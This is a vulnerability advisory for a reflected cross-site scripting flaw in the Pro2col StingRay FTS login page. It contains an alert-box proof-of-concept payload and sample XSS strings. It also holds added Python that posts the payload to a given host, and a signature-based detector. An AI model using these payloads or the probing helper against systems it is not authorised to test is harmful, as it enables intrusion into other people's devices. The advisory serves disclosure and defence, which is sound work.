pro2col-xss.txt

2008-09-12T00:00:00
ID PACKETSTORM:69934
Type packetstorm
Reporter Marc Ruef
Modified 2008-09-12T00:00:00

Description

                                        
Pro2col StingRay FTS login username cross site scripting  
  
scip AG Vulnerability ID 3809 (09/12/2008)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3809  
  
I. INTRODUCTION  
  
StingRay FTS is a file transfer server for Internet communications.  
Customers are able to transfer files or to send emails via the device.  
  
More information is available on the official product web site at the  
following URL:  
  
http://pro2col.com/solutions/products/stingray_fts  
  
II. DESCRIPTION  
  
Marc Ruef at scip AG found an input validation error within the current  
release.  
  
The login form at /login.jsp, which is reachable without any  
authentication, submits the user name to /verify_login.jsp, which reflects  
it back into the error page without encoding. This can be used to run  
arbitrary script code in the context of the application (a reflected cross  
site scripting attack). Other parts of the application might be affected  
too.  
  
--- cut ---  
  
<form name="form_login" method="post" action="verify_login.jsp">  
<input type="hidden" name="form_browser_os" value="2">  
<input type="hidden" name="form_browser_type" value="2">  
<table border="0" cellspacing="0" width="100%"  
class="loginheadertable">  
<tr>  
<td valign="center" class="loginheadertable">StingRay Login</td>  
  
</tr>  
</table>  
<img border="0" src="images/line.jpg" width="100%" height="10"></img>  
<table border="0" cellpadding="5" cellspacing="5" width="100%"  
class="stdtable">  
<tr height="25" valign="middle">  
<td width="15%">Benutzername</td>  
<td width="35%"><input type="text" name="form_username"  
size="30"></td>  
<td width="50%"> </td>  
  
</tr>  
<tr height="15" valign="middle">  
<td>Passwort</td>  
<td>  
<input type="password" name="form_password" size="30">  
</td>  
<td> </td>  
</tr>  
  
</table>  
<img border="0" src="images/line.jpg" width="100%" height="10">  
<table border="0" cellpadding="5" cellspacing="5" width="100%"  
class="stdtable">  
<tr>  
<td width="50%" align="right">  
<input type="Image" src="images/bt_login_de.gif" name="login"  
class="formbutton"  
onClick="SetBrowserParam(this.form);">  
</td>  
<td> </td>  
</tr>  
  
</table>  
</form>  
  
--- cut ---  
  
III. EXPLOITATION  
  
Classic script injection techniques and unexpected input data within a  
browser session can be used to exploit this vulnerability.  
  
An insecure installation can be verified with a simple form input. Use the  
following string as the user name together with a wrong password for the  
proof-of-concept:  
  
<script>alert('scip');</script>  
  
The script injection happens in this line (between the H3 tags) in the  
file /verify_login.jsp; the German text reads "The user ... could not be  
found in the database. Please try again...":  
  
<H3>Der Benutzer <script>alert('scip');</script> konnte nicht in der  
Datenbank gefunden werden.<br><br>Bitte wiederholen...</H3>  
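As an added example (not code from the advisory or from Pro2col), the Python below reconstructs the reflected sink shown above, puts the hardened form beside it, and gives a helper that submits the proof-of-concept to a host and checks the response the same way. The two render functions and check_target are reconstructions of the behaviour the advisory describes; the path /verify_login.jsp and the field names come from the form above.

```python
"""Added example: the reflected sink in verify_login.jsp modelled in Python,
its hardened form, and a check that tells the two apart in a response body.
Not the product's own code; the render functions reconstruct the behaviour
the advisory shows."""
import html
import urllib.parse
import urllib.request

# The advisory's proof-of-concept user name
PAYLOAD = "<script>alert('scip');</script>"


def render_error_vulnerable(username):
    """Reconstruction of the vulnerable sink: the submitted user name is
    concatenated into the error message without any encoding."""
    return ("<H3>Der Benutzer " + username
            + " konnte nicht in der Datenbank gefunden werden."
            "<br><br>Bitte wiederholen...</H3>")


def render_error_fixed(username):
    """Hardened form: HTML-entity-encode the untrusted value before it is
    placed in element content. quote=True also encodes ' and ", so the same
    helper is safe inside quoted attribute values."""
    return ("<H3>Der Benutzer " + html.escape(username, quote=True)
            + " konnte nicht in der Datenbank gefunden werden."
            "<br><br>Bitte wiederholen...</H3>")


def reflects_unescaped(body, probe=PAYLOAD):
    """True if the probe appears verbatim in the response, i.e. the server
    reflected it without encoding the < > ' characters."""
    return probe in body


def login_form_body(username, password="wrong"):
    """Encode the fields as the form on /login.jsp submits them, hidden
    browser fields included."""
    return urllib.parse.urlencode({
        "form_browser_os": "2",
        "form_browser_type": "2",
        "form_username": username,
        "form_password": password,
    }).encode()


def check_target(base_url, timeout=10):
    """Post the PoC to /verify_login.jsp on a host you are authorised to
    test and report whether it reflects the payload unencoded. Needs
    network access; the offline demo below does not call it."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/verify_login.jsp",
        data=login_form_body(PAYLOAD),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return reflects_unescaped(body)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # e.g. python3 stingray_xss_check.py http://stingray.internal
        print("vulnerable" if check_target(sys.argv[1]) else "not reflected")
    else:
        for render in (render_error_vulnerable, render_error_fixed):
            body = render(PAYLOAD)
            verdict = "reflects unescaped" if reflects_unescaped(body) else "encoded"
            print(render.__name__, "->", verdict)
            print("   ", body)
```

Run without arguments for the offline comparison of the two renderings; with a base URL it posts the same form body the browser would and reports whether the payload came back verbatim. Matching on the exact probe string keeps the check free of false positives from an encoded echo such as `&lt;script&gt;`.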
  
Vulnerable hosts can also be located via Google hacking, as Johnny Long  
has documented in his web database[2]. httprecon supports web  
fingerprinting of such devices too[1]. A plugin for our open-source  
exploitation framework Attack Tool Kit (ATK) will be published in the  
future[3].  
  
IV. IMPACT  
  
Because non-authenticated parts of the software are affected, this  
vulnerability is serious for every secure environment. Unauthenticated  
attackers might be able to exploit this flaw to gain elevated privileges  
(e.g. by extracting sensitive cookie information or by launching a buffer  
overflow attack against another user's web browser). However, as Robert  
Welz of Pro2col told me via email, the affected login part should be  
available on the internal interface only.  
  
Because other parts of the application might be affected too - this  
could include some second order vulnerabilities - a severe attack  
scenario might be possible.  
  
V. DETECTION  
  
Detecting web based attacks requires a specialized web proxy and/or  
intrusion detection system. Patterns for such detection are available  
and easy to implement. Usually the less-than (<) and greater-than (>)  
characters are required to form an HTML tag. In some cases single (') or  
double quotes (") are required to break out of a given HTML attribute or  
script string and inject the code. Some security systems also look for  
well-known attack tags such as <script> and event-handler attributes such  
as onMouseOver. However, these are usually not capable of identifying  
highly optimized payloads.  
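As an added example, not from the advisory, here is that detection logic in Python run over constructed login submissions (the rule names, sample traffic and client addresses are made up). It shows what the paragraph states: the generic meta-character rules flag a payload that carries neither <script> nor an on*= attribute, while the quote rule also fires on a harmless name, which is the trade-off a practitioner has to tune.

```python
"""Added example: the signature-style XSS detection the advisory describes,
run over constructed form submissions to verify_login.jsp. Not part of the
advisory; sample traffic and rule names are made up."""
import re
import urllib.parse

# The advisory's detection patterns: < > to form a tag, ' " to break out of
# an attribute or script string, and the well-known tag/attribute signatures.
RULES = {
    "angle_brackets": re.compile(r"[<>]"),
    "quotes": re.compile(r"['\"]"),
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.IGNORECASE),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
}
# Signature rules alone are what a naive IDS would ship with.
SIGNATURE_RULES = {"script_tag", "event_handler"}


def login_form_body(username, password="wrong"):
    """Constructed request body, encoded as the /login.jsp form submits it."""
    return urllib.parse.urlencode({
        "form_browser_os": "2",
        "form_browser_type": "2",
        "form_username": username,
        "form_password": password,
    })


# Constructed traffic as a web proxy in front of verify_login.jsp would see it
SAMPLE_REQUESTS = [
    ("10.0.0.5", login_form_body("alice")),                                # benign
    ("10.0.0.9", login_form_body("<script>alert('scip');</script>")),      # the advisory's PoC
    ("10.0.0.9", login_form_body('<a href="javascript:alert(1)">x</a>')),  # no <script>, no on*=
    ("10.0.0.9", login_form_body("<img src=x onerror=alert(1)>")),         # no quotes at all
    ("10.0.0.7", login_form_body("O'Brien")),                              # benign, quote rule fires
]


def scan_body(body):
    """Decode the form body and return {parameter: set(rule names)} for every
    parameter value that matches at least one rule."""
    hits = {}
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            matched = {rule for rule, rx in RULES.items() if rx.search(value)}
            if matched:
                hits.setdefault(name, set()).update(matched)
    return hits


def scan_requests(requests):
    """Return (client_ip, hits) for every request that triggered a rule."""
    findings = []
    for ip, body in requests:
        hits = scan_body(body)
        if hits:
            findings.append((ip, hits))
    return findings


def missed_by_signatures(findings):
    """Requests flagged only by the generic < > ' " rules: an IDS that relies
    on <script>/on*= signatures alone would let these through."""
    return [(ip, hits) for ip, hits in findings
            if not any(SIGNATURE_RULES & rules for rules in hits.values())]


if __name__ == "__main__":
    findings = scan_requests(SAMPLE_REQUESTS)
    for ip, hits in findings:
        print(ip, {k: sorted(v) for k, v in hits.items()})
    print("signature-only IDS would miss:",
          len(missed_by_signatures(findings)), "of", len(findings))
```

Decoding the body before matching matters: the proxy sees `%3Cscript%3E`, not `<script>`, and a rule applied to the raw body would miss every payload. The remaining false positive (the apostrophe in a real surname) is why the quote rule is usually scored lower than the angle-bracket rule rather than blocked outright.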
  
VI. SOLUTION  
  
We informed Pro2col at an early stage. They confirmed the problem and  
initially announced a bugfix for a release scheduled in March 2008. A  
re-scheduling was proposed and no further details were provided. Our last  
request stood unanswered for a long time. Until a fix is available, the  
reflected user name in /verify_login.jsp should be HTML-entity encoded  
before output, and the login interface should not be exposed to untrusted  
networks.  
  
VII. VENDOR RESPONSE  
  
Pro2col was first informed on 2007/12/06 via email at  
info-at-pro2col.com. A very kind reply by James Lewis came back a few  
hours later. Further discussion of the flaw (how to reproduce it) was held  
with Robert Welz. A re-scheduling of the planned patch was proposed. Our  
last request stood unanswered for a long time.  
  
VIII. SOURCES  
  
scip AG - Security Consulting Information Process (german)  
http://www.scip.ch/  
  
scip AG Vulnerability Database (german)  
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3809  
  
computec.ch document data base (german)  
http://www.computec.ch/download.php  
  
IX. DISCLOSURE TIMELINE  
  
2007/12/05 Identification of the vulnerability  
2007/12/06 First information to info-at-pro2col.com  
2007/12/07 Immediate reply by and further discussion with James Lewis  
2008/01/11 Technical confirmation by Robert Welz  
2008/03/18 Status report by Robert Welz  
2008/07/08 Offering for re-check of the patch by Robert Welz  
2008/07/09 Undefined re-scheduling of the patch  
2008/08/29 Last request for actual status (no reply)  
2008/09/12 Public advisory  
  
X. CREDITS  
  
The vulnerability was discovered by Marc Ruef.  
  
Marc Ruef, scip AG, Zuerich, Switzerland  
maru-at-scip.ch  
http://www.scip.ch/  
  
A1. BIBLIOGRAPHY  
  
[1] http://www.computec.ch/projekte/httprecon/  
[2] http://johnny.ihackstuff.com/ghdb.php?function=detail&id=1814  
[3] http://www.computec.ch/projekte/atk/  
  
A2. LEGAL NOTICES  
  
Copyright (c) 2007-2008 scip AG, Switzerland.  
  
Permission is granted for the re-distribution of this alert. It may not  
be edited in any way without permission of scip AG.  
  
The information in the advisory is believed to be accurate at the time  
of publishing based on currently available information. There are no  
warranties with regard to this information. Neither the author nor the  
publisher accepts any liability for any direct, indirect or  
consequential loss or damage from use of or reliance on this advisory.  